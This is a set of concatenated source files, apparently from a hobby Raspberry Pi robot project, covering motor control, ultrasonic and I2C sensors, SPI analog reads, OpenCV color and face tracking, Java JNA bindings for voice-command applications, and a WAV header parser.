cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#endif
cmd->posneg = SET_POSNEG | CH0 | CH1 | CH2 | CH3;
cmd->breaks = SET_BREAKS | CH0 | CH1 | CH2 | CH3;
cmd->wrrom = 0; /* WR_MAGIC | WR_OFFSET | WR_SELOUT;*/
/*--- switch to ccmd mode ---*/
/*--- from now on the mode is maintained until it is switched to ccmd mode ---*/
if (ioctl(fd, URBTC_COUNTER_SET) < 0){
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
// printf("sizeof(cmd) %d\n", sizeof(cmd));
/*--- write the ccmd values to the H8 ---*/
if (write(fd, cmd, sizeof(*cmd)) < 0) { /* sizeof(*cmd): write the struct, not the pointer */
fprintf(stderr, "write error\n");
exit(1);
}
#if 0
/*set scmd mode*/
if (ioctl(fd, URBTC_DESIRE_SET) < 0){
fprintf(stderr, "ioctl: URBTC_DESIRE_SET error\n");
exit(1);
}
#endif
for (i=0; i<4; i++) {
#if __BYTE_ORDER == __LITTLE_ENDIAN
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 1;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 1;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 1;
#else
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 0x0100;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 0x0100;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 0x0100;
#endif
}
}
void go_straight(struct ccmd *cmd, unsigned short speed, int front)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if(front){
a += speed;
b -= speed;
}else{
a -= speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0){
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0){
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void turn(struct ccmd *cmd, unsigned short speed, int left)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if(left){
a -= speed;
b -= speed;
}else{
a += speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0){
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0){
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void stop(struct ccmd *cmd)
{
unsigned short zero = WHEEL_ZERO;
zero <<= 5;
cmd->offset[1] = zero;
cmd->offset[2] = zero;
write(fd, cmd, sizeof(*cmd));
}
void exit_program(int sig) /* standard signal-handler signature */
{
quit_flag = 0;
fprintf(stderr, "kill signal is received\n");
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>
#include <wiringPi.h>
#define TRIG_PIN 17
#define ECHO_PIN 27
#define MEASURE_INTERVAL 1
int
pulseIn(
int pin,
int level,
int timeout
) {
struct timeval tn, t0, t1;
long micros;
memset(&tn, 0, sizeof(struct timeval));
memset(&t1, 0, sizeof(struct timeval));
gettimeofday(&t0, NULL);
micros = 0;
while (digitalRead(pin) != level)
{
gettimeofday(&tn, NULL);
if (tn.tv_sec > t0.tv_sec) {
/* count every elapsed second, not just one */
micros = (tn.tv_sec - t0.tv_sec) * 1000000L;
} else {
micros = 0;
}
micros += (tn.tv_usec - t0.tv_usec);
if (micros > timeout) {
return 0;
}
}
gettimeofday(&t1, NULL);
while (digitalRead(pin) == level)
{
gettimeofday(&tn, NULL);
if (tn.tv_sec > t0.tv_sec) {
micros = (tn.tv_sec - t0.tv_sec) * 1000000L;
} else {
micros = 0;
}
micros = micros + (tn.tv_usec - t0.tv_usec);
if (micros > timeout) {
return 0;
}
}
if (tn.tv_sec > t1.tv_sec) {
micros = (tn.tv_sec - t1.tv_sec) * 1000000L;
} else {
micros = 0;
}
micros = micros + (tn.tv_usec - t1.tv_usec);
return (int)micros;
}
void
measure_distance()
{
int duration, distance;
/* init sensor*/
digitalWrite(TRIG_PIN, LOW);
delayMicroseconds(2);
digitalWrite(TRIG_PIN, HIGH);
delayMicroseconds(10);
digitalWrite(TRIG_PIN, LOW);
/* measure distance */
duration = pulseIn(ECHO_PIN, HIGH, 1000000);
// printf("duration=%d\n",duration);
/* sound travels roughly 29.1 us per cm; halve the echo time for the round trip */
distance = (duration / 2) / 29.1;
printf("distance=%d cm\n", distance);
}
int
main (
int argc,
char **argv
) {
int i;
if(wiringPiSetupGpio() == -1) {
return 1;
}
pinMode(TRIG_PIN,OUTPUT);
pinMode(ECHO_PIN,INPUT);
for(i=0; i<10; i++) {
measure_distance();
sleep(MEASURE_INTERVAL);
}
return(EXIT_SUCCESS);
}
<file_sep>import java.util.List;
interface ICore {
void Order(List<JuliusWord> wordList);
}
<file_sep>import java.util.Scanner;
class ThreadTester {
public static void main(String[] args) {
System.out.println("ThreadTester");
Scanner scan = new Scanner(System.in);
String str;
Process thread = new Process();
thread.start();
while(true){
System.out.println("Please Input :");
str = scan.next();
if(!str.equals("q"))continue;
System.out.println("Exit");
thread.Stop();
break;
}
return;
}
}
class Process extends Thread {
private volatile boolean running = true; // volatile: the busy loop must see Stop()'s update
public void start(){
new Thread(this).start();
}
@Override
public void run (){
System.out.println("Process:running....");
while(running){
// busy-wait; the empty print also acted as a makeshift memory barrier
System.out.print("");
}
System.out.println("Process:EXIT");
}
public void Stop(){
running = false;
System.out.println("Process.Stop():running = " + running);
}
}
<file_sep>#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h> // read, write, close, usleep
#include <sys/ioctl.h> // ioctl
#include "/usr/include/linux/i2c-dev.h"
#include "signal.h"
#include "move_api.h"
void quit_func();
int quit_flg = 0;
int range1 = 0;
int range2 = 0;
int main()
{
int fd1, fd2;
char filename[ 20 ];
char buf[ 10 ];
int res;
// open the I2C data bus
sprintf(filename, "/dev/i2c-1");
// first sensor (address 0xE2)
fd1 = open(filename, O_RDWR);
if (fd1 < 0) {
printf("Error on open\n");
exit(1);
}
if (ioctl(fd1, I2C_SLAVE, (0xE2 >> 1) ) < 0) { // 0xE2 (0b11100010) >> 1 = 0x71 (0b01110001), the 7-bit address
printf("Error on slave address 0xE2\n");
exit(1);
}
// second sensor (address 0xE6)
fd2 = open(filename, O_RDWR);
if (fd2 < 0) {
printf("Error on open\n");
exit(1);
}
if (ioctl(fd2, I2C_SLAVE, (0xE6 >> 1) ) < 0) { // 0xE6 (0b11100110) >> 1 = 0x73 (0b01110011), the 7-bit address
printf("Error on slave address 0xE6\n");
exit(1);
}
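/* Each pass below follows the SRF02-style I2C ranging protocol (an inference
   from the register usage, not documented in this file): write command 0x51
   ("range in cm") to register 0x00, wait ~66 ms for the ping to return, then
   read the 16-bit distance from registers 0x02 (high byte) and 0x03 (low). */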
while (!quit_flg)
{
// first sensor
// read from 0xE2
buf[ 0 ] = 0x00;
buf[ 1 ] = 0x51;
if ( (write(fd1, buf, 2) ) != 2) {
printf("0xE2 Error send the read command\n");
exit(1);
}
// Wait for the measurement
usleep(66000);
buf[ 0 ] = 0x02;
if ( (write(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on select the Range High Byte\n");
exit(1);
}
if ( (read(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on read the Range High Byte\n");
exit(1);
}
range1 = buf[ 0 ] << 8;
buf[ 0 ] = 0x03;
if ( (write(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on select the Range Low Byte\n");
exit(1);
}
if ( (read(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on read the Range Low Byte\n");
exit(1);
}
range1 |= buf[ 0 ];
// second sensor
// read from 0xE6
buf[ 0 ] = 0x00;
buf[ 1 ] = 0x51;
if ( (write(fd2, buf, 2) ) != 2) {
printf("0xE6 Error send the read command\n");
exit(1);
}
// Wait for the measurement
usleep(66000);
buf[ 0 ] = 0x02;
if ( (write(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on select the Range High Byte\n");
exit(1);
}
if ( (read(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on read the Range High Byte\n");
exit(1);
}
range2 = buf[ 0 ] << 8;
buf[ 0 ] = 0x03;
if ( (write(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on select the Range Low Byte\n");
exit(1);
}
if ( (read(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on read the Range Low Byte\n");
exit(1);
}
range2 |= buf[ 0 ];
}
close(fd1);
close(fd2);
return 0;
}
int get_left()
{
return range1;
}
int get_right()
{
return range2;
}
void quit_func()
{
printf("quit\n");
quit_flg = 1;
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <wiringPi.h>
#include <unistd.h>
#define MOTOROUT1 14
#define MOTOROUT2 15
#define MOTORPWM 18
#define POW 1024
int main(void) {
if ( wiringPiSetupGpio() == -1) {
printf("setup error");
return 1;
}
pinMode(MOTOROUT1, OUTPUT);
pinMode(MOTOROUT2, OUTPUT);
pinMode(MOTORPWM, PWM_OUTPUT);
digitalWrite(MOTOROUT1, 0);
digitalWrite(MOTOROUT2, 0);
digitalWrite(MOTORPWM, 0);
while(1) {
printf("forward\n");
digitalWrite(MOTOROUT1, 1);
pwmWrite(MOTORPWM, POW);
sleep(5);
pwmWrite(MOTORPWM, 0);
digitalWrite(MOTOROUT1, 0);
usleep(50000);
printf("back\n");
digitalWrite(MOTOROUT2, 1);
pwmWrite(MOTORPWM, POW);
sleep(5);
pwmWrite(MOTORPWM, 0);
digitalWrite(MOTOROUT2, 0);
printf("STOP\n");
sleep(5);
}
return 0;
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface ObjLib extends Library {
String path = "/home/pi/work/robot/RobotPrograms/libobj_cv.so";
ObjLib INSTANCE = (ObjLib) Native.loadLibrary(path, ObjLib.class);
// convention: returns 0 on success, -1 on error
int searchObj(String obj); // JNA maps Java String to the C function's "char *"
int searchUser(int uid);
}
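// Minimal usage sketch (my illustration; it assumes the native library really
// exports these two functions -- "Red" is one of the colors searchObj handles,
// and the uid is whatever label the face recognizer was trained with):
class ObjLibExample {
    public static void main(String[] args) {
        int rc = ObjLib.INSTANCE.searchObj("Red"); // 0 once the object is reached
        System.out.println("searchObj returned " + rc);
        rc = ObjLib.INSTANCE.searchUser(1);        // approach the user with face id 1
        System.out.println("searchUser returned " + rc);
    }
}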
<file_sep>interface IApplication {
// Called when the application starts. Avoid things like running a while loop in here.
void Start();
// Called when the application quits.
void Quit();
// Called every frame while the application is running.
void Update();
// Called at shutdown, before Quit. Put any cleanup here. Return 0 on normal termination.
int Cleanup();
// While the application is running, recognized words arrive from Julius.
// The word strings are defined on the Julius side (e.g. spoken input "konnichiwa" -> word = "hello").
void Order(String word);
// The application can terminate itself by returning false here.
boolean IsRunning();
}
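// Sketch of the host-side loop these callbacks imply (my reading of the
// comments above, not code found in this repository; "app" stands for any
// IApplication implementation such as ShootApp):
class ApplicationDriverSketch {
    static void run(IApplication app) {
        app.Start();
        while (app.IsRunning()) {
            app.Update();
            // app.Order(word) would be invoked here whenever Julius recognizes a word
        }
        app.Cleanup(); // returns 0 on normal termination
        app.Quit();
    }
}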
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define SPI_CHANNEL 0
#define SS_PORT 8
#define MOTOR_OUT1 14
#define MOTOR_OUT2 15
#define SLEEP 100000
#define PR_LOW_CH 1
#define THRESHOLD_PR 1500
#define TERM_PR 10
int main(int argc, char **argv){
int a2dVal = 0, count = 0;
unsigned char data[3];
struct timeval start, end;
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0) {
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
pinMode(MOTOR_OUT1, OUTPUT);
pinMode(MOTOR_OUT2, OUTPUT);
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
digitalWrite(MOTOR_OUT2, 1);
gettimeofday(&start, NULL);
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 |(((PR_LOW_CH & 0x03) << 6));
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
gettimeofday(&end, NULL);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int sec = end.tv_sec - start.tv_sec;
int time = sec * 1000000 + end.tv_usec;
time -= start.tv_usec;
printf("%d usec\n", time);
return time;
}
<file_sep>#include <opencv2/core.hpp>
#include <opencv2/videoio.hpp>
#include <opencv2/highgui.hpp>
#include <opencv2/video/tracking.hpp>
#include <opencv2/imgproc.hpp>
#include <opencv2/face.hpp>
#include <opencv2/objdetect.hpp>
#include <iostream>
#include <fstream>
#include <sstream>
#include <vector>
#include <string.h>
#include "move_api.h"
#define CAMERA_U_IDX 0
#define CAMERA_F_IDX 0
#define NFC 3 //NotFoundCount Threshold
#define FC 3 //FoundCount Threshold
#define TURN_S 500
#define STRAIGHT_S 500
#define STRAIGHT_SLOW 200
using namespace cv;
using namespace cv::face;
using namespace std;
int AREA_TS = 307200 * 0.8;
int AREA_SLOW = 307200 * 0.6;
string fn_haar = "/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml";
string fn_csv = "/home/pi/work/robot/RobotPrograms/resources/face.csv";
extern "C" void read_csv(const string& filename, vector<Mat>& images, vector<int>& labels, char separator = ';') {
std::ifstream file(filename.c_str(), ifstream::in);
if (!file) {
string error_message = "No valid input file was given, please check the given filename.";
CV_Error(CV_StsBadArg, error_message);
return;
}
string line, path, classlabel;
while (getline(file, line)) {
stringstream liness(line);
getline(liness, path, separator);
getline(liness, classlabel);
if(!path.empty() && !classlabel.empty()) {
images.push_back(imread(path, 0));
labels.push_back(atoi(classlabel.c_str()));
}
}
}
extern "C" int searchObj(char* color) {
cv::Scalar max;
cv::Scalar min;
if (strcmp(color, "Yellow") == 0) {
min = cv::Scalar(40, 100, 160);
max = cv::Scalar(70, 255, 255);
} else if (strcmp(color, "Blue") == 0) {
min = cv::Scalar(100, 150, 50);
max = cv::Scalar(170, 255, 255);
} else if (strcmp(color, "Red") == 0) {
min = cv::Scalar(0, 150, 150);
max = cv::Scalar(40, 255, 255);
} else {
return -1;
}
g_init();
/* // >>>> Kalman Filter
int stateSize = 6;
int measSize = 4;
int contrSize = 0;
unsigned int type = CV_32F;
cv::KalmanFilter kf(stateSize, measSize, contrSize);
cv::Mat state(stateSize, 1, type); // [x,y,v_x,v_y,w,h]
cv::Mat meas(measSize, 1, type); // [z_x,z_y,z_w,z_h]
//cv::Mat procNoise(stateSize, 1, type)
// [E_x,E_y,E_v_x,E_v_y,E_w,E_h]
// Transition State Matrix A
// Note: set dT at each processing step!
// [ 1 0 dT 0 0 0 ]
// [ 0 1 0 dT 0 0 ]
// [ 0 0 1 0 0 0 ]
// [ 0 0 0 1 0 0 ]
// [ 0 0 0 0 1 0 ]
// [ 0 0 0 0 0 1 ]
cv::setIdentity(kf.transitionMatrix);
// Measure Matrix H
// [ 1 0 0 0 0 0 ]
// [ 0 1 0 0 0 0 ]
// [ 0 0 0 0 1 0 ]
// [ 0 0 0 0 0 1 ]
kf.measurementMatrix = cv::Mat::zeros(measSize, stateSize, type);
kf.measurementMatrix.at<float>(0) = 1.0f;
kf.measurementMatrix.at<float>(7) = 1.0f;
kf.measurementMatrix.at<float>(16) = 1.0f;
kf.measurementMatrix.at<float>(23) = 1.0f;
// Process Noise Covariance Matrix Q
// [ Ex 0 0 0 0 0 ]
// [ 0 Ey 0 0 0 0 ]
// [ 0 0 Ev_x 0 0 0 ]
// [ 0 0 0 Ev_y 0 0 ]
// [ 0 0 0 0 Ew 0 ]
// [ 0 0 0 0 0 Eh ]
//cv::setIdentity(kf.processNoiseCov, cv::Scalar(1e-2));
kf.processNoiseCov.at<float>(0) = 1e-2;
kf.processNoiseCov.at<float>(7) = 1e-2;
kf.processNoiseCov.at<float>(14) = 5.0f;
kf.processNoiseCov.at<float>(21) = 5.0f;
kf.processNoiseCov.at<float>(28) = 1e-2;
kf.processNoiseCov.at<float>(35) = 1e-2;
// Measures Noise Covariance Matrix R
cv::setIdentity(kf.measurementNoiseCov, cv::Scalar(1e-1));
// <<<< Kalman Filter
*/
cv::VideoCapture cap(CAMERA_F_IDX); // open the capture device
if(!cap.isOpened()){ // bail out if the camera could not be opened
return -1;
}
cv::Mat frame;
cv::Mat res;
cv::Rect bBoxmax;
double ticks = 0;
bool found = false;
int notFoundCount = 0;
// g_init();
while(1) {
cap >> frame;
frame.copyTo(res);
double precTick = ticks;
ticks = (double)cv::getTickCount();
double dT = (ticks - precTick) / cv::getTickFrequency(); //seconds
/*
if (found) {
// >>>> Matrix A
kf.transitionMatrix.at<float>(2) = dT;
kf.transitionMatrix.at<float>(9) = dT;
// <<<< Matrix A
//cout << "dT:" << endl << dT << endl;
state = kf.predict();
//cout << "State post:" << endl << state << endl;
cv::Rect predRect;
predRect.width = state.at<float>(4);
predRect.height = state.at<float>(5);
predRect.x = state.at<float>(0) - predRect.width / 2;
predRect.y = state.at<float>(1) - predRect.height / 2;
cv::Point center;
center.x = state.at<float>(0);
center.y = state.at<float>(1);
// cv::circle(res, center, 2, CV_RGB(255, 0, 0), -1);
// cv::rectangle(res, predRect, CV_RGB(255, 0, 0), 2);
}
*/
// >>>>> Noise smoothing
cv::Mat blur;
cv::GaussianBlur(frame, blur, cv::Size(5, 5), 3.0, 3.0);
// <<<<< Noise smoothing
// >>>>> HSV conversion
cv::Mat frmHsv;
cv::cvtColor(blur, frmHsv, CV_BGR2HSV);
// <<<<< HSV conversion
// >>>>> Color Thresholding
cv::Mat rangeRes = cv::Mat::zeros(frame.size(), CV_8UC1);
cv::inRange(frmHsv, min, max, rangeRes); // use the range chosen for the requested color (was hard-coded to blue)
// <<<<< Color Thresholding
// >>>>> Improving the result
cv::erode(rangeRes, rangeRes, cv::Mat(), cv::Point(-1, -1), 2);
cv::dilate(rangeRes, rangeRes, cv::Mat(), cv::Point(-1, -1), 2);
// <<<<< Improving the result
std::vector<std::vector<cv::Point> > contours;
cv::findContours(rangeRes, contours, CV_RETR_EXTERNAL, CV_CHAIN_APPROX_NONE);
cv::Rect bBox;
std::vector<cv::Point> max;
std::vector<std::vector<cv::Point> > resultbox;
if (contours.size() == 0) {
sleep(1);
g_turn(0, TURN_S);
cout << "Not found" << endl;
} else {
max = contours[0];
bBoxmax = cv::boundingRect(max);
bBox = bBoxmax;
for (size_t i = 0; i < contours.size(); i++) {
bBox = cv::boundingRect(contours[i]);
if (bBox.area() > bBoxmax.area()){
bBoxmax = bBox;
max = contours[i];
}
}
int X, Y;
X = bBoxmax.x + bBoxmax.width / 2;
Y = bBoxmax.y + bBoxmax.height / 2;
if (X > 0 && X < 260) {
sleep(1);
g_turn(1,TURN_S);
cout << "turn left" << endl;
} else if (X >340 && X < 640) {
sleep(1);
g_turn(0, TURN_S);
cout << "turn right" << endl;
} else if (Y <= 440) {
sleep(1);
g_go_straight(1, TURN_S);
cout << "go straight" << endl;
} else if (Y > 440 && X <= 340 && X >= 260){
time_t t = time(NULL);
cout << "almost there.." << endl;
while (time(NULL) - t <= 1) {
g_go_straight(1,STRAIGHT_S);
}
g_stop();
g_quit();
return 0;
}
}
/* // >>>>> Kalman Update
if (resultbox.size() == 0) {
// X = 1300;
// Y = 800;
notFoundCount++;
if (notFoundCount >= 100) {
found = false;
}
} else {
notFoundCount = 0;
meas.at<float>(0) = bBoxmax.x + bBoxmax.width / 2;
meas.at<float>(1) = bBoxmax.y + bBoxmax.height / 2;
meas.at<float>(2) = (float)bBoxmax.width;
meas.at<float>(3) = (float)bBoxmax.height;
if (!found) // First detection!
{
// >>>> Initialization
kf.errorCovPre.at<float>(0) = 1; // px
kf.errorCovPre.at<float>(7) = 1; // px
kf.errorCovPre.at<float>(14) = 1;
kf.errorCovPre.at<float>(21) = 1;
kf.errorCovPre.at<float>(28) = 1; // px
kf.errorCovPre.at<float>(35) = 1; // px
state.at<float>(0) = meas.at<float>(0);
state.at<float>(1) = meas.at<float>(1);
state.at<float>(2) = 0;
state.at<float>(3) = 0;
state.at<float>(4) = meas.at<float>(2);
state.at<float>(5) = meas.at<float>(3);
// <<<< Initialization
found = true;
} else {
kf.correct(meas); // Kalman Correction
}
}
*/
// cv::imshow("Threshold", res);
}
g_quit();
return 0;
}
extern "C" int searchUser(int uid) {
vector<Mat> images;
vector<int> labels;
try {
read_csv(fn_csv, images, labels);
} catch (cv::Exception& e) {
cerr << "Error opening file \"" << fn_csv << "\". Reason: " << e.msg << endl;
return -1;
}
g_init();
int im_width = images[0].cols;
int im_height = images[0].rows;
Ptr<FaceRecognizer> model = createFisherFaceRecognizer();
model->train(images, labels);
CascadeClassifier haar_cascade;
haar_cascade.load(fn_haar);
VideoCapture cap(CAMERA_U_IDX);
if(!cap.isOpened()) {
cerr << "Capture Device cannot be opened." << endl;
return -1;
}
int notFoundCount = 0, FoundCount = 0;
Mat frame;
for(;;) {
cap >> frame;
Mat original = frame.clone();
Mat gray;
cvtColor(original, gray, CV_BGR2GRAY);
vector< Rect_<int> > faces;
haar_cascade.detectMultiScale(gray, faces);
// guard: faces[0] below is undefined behaviour when nothing is detected
if (faces.empty()) { notFoundCount++; usleep(20000); continue; }
Rect max = faces[0];
for(size_t i = 0; i < faces.size(); i++) {
if (faces[i].area() < max.area()) {
continue;
}
max = faces[i];
}
Rect face_i = max;
Mat face = gray(face_i);
Mat face_resized;
cv::resize(face, face_resized, Size(im_width, im_height), 1.0, 1.0, INTER_CUBIC);
int prediction = model->predict(face_resized);
if (prediction != uid) {
notFoundCount++;
} else {
FoundCount++;
}
if (notFoundCount > NFC) {
notFoundCount = 0;
FoundCount = 0;
g_turn(1, TURN_S);
} else if (FoundCount > FC) {
notFoundCount = 0;
FoundCount = 0;
int X, Y, area;
X = face_i.x + face_i.width / 2;
Y = face_i.y + face_i.height / 2;
area = face_i.width * face_i.height;
if (area > AREA_TS) {
g_stop();
g_quit();
return 0;
} else if (X > 0 && X < 260) {
sleep(1);
g_turn(1,TURN_S);
cout << "turn left" << endl;
} else if (X >340 && X < 640) {
sleep(1);
g_turn(0, TURN_S);
cout << "turn right" << endl;
} else if (X <= 340 && X >= 260){
sleep(1);
if (area > AREA_SLOW) {
g_go_straight(1, STRAIGHT_SLOW);
} else {
g_go_straight(1, STRAIGHT_S);
}
}
}
usleep(20000);
}
return -1;
}
int main(int argh, char* argv[]) {
int test = atoi(argv[1]);
if (test == 1) { //User
searchUser(atoi(argv[2]));
} else if (test == 2) { //Object
searchObj(argv[2]);
}
return 0;
}
<file_sep>#include <opencv2/core/core.hpp>
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
#include "stdio.h"
using namespace cv;
unsigned char max_intensity = 0;
int target_x = 0;
int target_y = 0;
int window_x_center = 0;
int window_y_max = 0;
int quit_brightness = 0;
Mat brightness;
VideoCapture capture;
extern "C" int start_brightness()
{
VideoCapture cap(0); // open the default camera
capture = cap;
if(!cap.isOpened()) // check whether it opened successfully
return -1;
namedWindow("brightness",1);
// the camera is released automatically by the VideoCapture destructor
return 0;
}
extern "C" void update_brightness(){
Mat frame;
capture >> frame; // grab a new frame from the camera
cv::cvtColor(frame, brightness, CV_BGR2GRAY);
window_x_center = brightness.cols/2;
window_y_max = brightness.rows;
unsigned char intensity = 0;
max_intensity = 0;
for( int y = 0; y < brightness.rows; y++ ) {
for( int x = 0; x < brightness.cols; x++ ) {
intensity = brightness.at<unsigned char>(y, x); // read the pixel value at (x, y)
if(intensity <= max_intensity){continue;}
// intensity is more than max_intensity
max_intensity = intensity;
target_x = x;
target_y = y;
}
}
//printf("max is %d at %d,%d\n", max_intensity,target_x,target_y);
// draw a line (image, start point, end point, color, thickness, line type)
line(brightness, Point(window_x_center, window_y_max), Point(target_x, target_y), Scalar(0,0,250), 3, 4);
imshow("brightness", brightness);
waitKey(30);
}
extern "C" int get_vec_x(){
return target_x - window_x_center;
}
extern "C" int get_vec_y(){
// reversed because image y coordinates grow downward
return window_y_max - target_y;
}
int main(){
start_brightness();
while(1){
update_brightness();
}
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface ArmLib extends Library {
String path = "/home/pi/work/robot/RobotPrograms/libarm_api.so";
ArmLib INSTANCE = (ArmLib) Native.loadLibrary(path, ArmLib.class);
// convention: returns 0 on success, -1 on error
int init();
int arm_open();
int arm_close();
int arm_fclose();
int raise();
int lower();
int lower_t(int clock);
void stop();
void quit();
}
<file_sep>#include <stdio.h>
#include <string.h>
/* WAV file header analysis program */
/* gcc -o wav wav.c */
/* ./wav sample.wav */
typedef struct{
char riff[4]; // RIFF header
unsigned int fileSize; // file size - 8
char wave[4]; // WAVE header
} wavHeader;
typedef struct{
unsigned char fmt[4]; // fmt chunk
int fmtSize; // size of the fmt chunk in bytes
} tagChank;
typedef struct{
unsigned short id; // format ID
unsigned short channels; // number of channels
unsigned int samplingRate; // sampling rate
unsigned int bytesPerSec; // data rate (bytes/sec)
unsigned short blockSize; // block size
unsigned short bitsPerSample; // bits per sample
} wavFormat;
int main(int argc,char *argv[]){
FILE *fp;
wavHeader header;
tagChank chank;
wavFormat format;
if (argc < 2 || (fp = fopen(argv[1], "rb")) == NULL) {
fprintf(stderr, "usage: %s file.wav\n", argv[0]);
return 1;
}
/* read the header */
fread(&header,sizeof(wavHeader),1,fp);
/* the 4-byte tags are not NUL-terminated, so print them with %.4s
(the original wrote riff[4]='\0', one byte past the end of the array) */
printf("chunk ID          : %.4s\n",header.riff);
printf("file size         : %u[bytes]\n",header.fileSize+8);
printf("file format       : %.4s\n",header.wave);
/* read the fmt chunk */
fread(&chank,sizeof(chank),1,fp);
long len =chank.fmtSize;
printf("fmt               : %.4s\n",(char*)chank.fmt);
printf("fmt chunk size    : %ld[bytes]\n",len);
/* read the format data */
fread(&format,sizeof(wavFormat),1,fp);
printf("format ID (PCM=1) : %d (0x%04x)\n",format.id,format.id);
printf("channels          : %d (mono=1 stereo=2)\n",format.channels);
printf("sampling rate     : %u[Hz]\n",format.samplingRate);
printf("data rate         : %u[bytes/sec]\n",format.bytesPerSec);
printf("block size        : %d[bytes]\n",format.blockSize);
printf("bits per sample   : %d[bit]\n",format.bitsPerSample);
printf("duration          : %.2f[sec]\n",(double)(header.fileSize+8)/format.bytesPerSec);
fclose(fp);
return 0;
}
<file_sep>import java.util.Scanner;
public class ShooterLibTester {
public static void main(String[] args) {
System.out.println("GUN GUN Shoot!");
ShooterLib shooter = ShooterLib.INSTANCE;
shooter.start_moter();
while (true) {
System.out.println("殺戮をやめるには1を");
Scanner scan = new Scanner(System.in);
String str = scan.next();
if (str.equals("1")) {
shooter.stop_moter();
break;
}
}
}
}
<file_sep>class BrightnessApp implements IApplication {
static final int threshold = 10;
private boolean quit = false;
public void Start(){
Robot.Init();
System.out.println("Brightness Ready !");
AudioLib.INSTANCE.play("Brightness.wav");
BrightnessLib.INSTANCE.start_brightness();
}
public void Quit(){
AudioLib.INSTANCE.play("EndBrightness.wav");
Robot.Stop();
Robot.Quit();
}
public void Update(){
BrightnessLib.INSTANCE.update_brightness();
int x = BrightnessLib.INSTANCE.get_vec_x();
int y = BrightnessLib.INSTANCE.get_vec_y();
if(x > threshold){
Robot.Turn(LR.Right, x);
}else if(x < -threshold){
Robot.Turn(LR.Left, -x);
}else if(y < threshold){
// inside the dead zone: close enough, nothing to do
}else{
Robot.Move(FB.Front, y);
}
}
public int Cleanup(){
System.out.println("Cleanup Robot...");
return 0;
}
public void Order(String word){
}
public boolean IsRunning(){
return !quit;
}
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define SPI_CHANNEL 0
#define SS_PORT 8
#define THRESHOLD 1500
#define TERM 3
#define SLEEP 100000
int main(int argc, char **argv){
int retCode;
int a2dChannel = 1; // analog channel
int a2dVal = 0;
unsigned char data[3];
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0)
{
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
digitalWrite(SS_PORT, 1);
int count = 0;
while(1) {
data[0] = 0b00000110; // first byte transmitted -> start bit -> (SGL/DIF = 1,D2=0)
data[1] = 0b01000000; // second byte transmitted -> (D1=D0=0)
data[2] = 0; // third byte transmitted....don't care
digitalWrite(SS_PORT, 0);
retCode=wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
printf("a2dVal=%d\n",a2dVal);
if (a2dVal > THRESHOLD) {
count++;
if (count > TERM) {
printf("Reach the top.\n");
break;
}
} else {
count = 0;
}
usleep(SLEEP);
}
return 0;
}
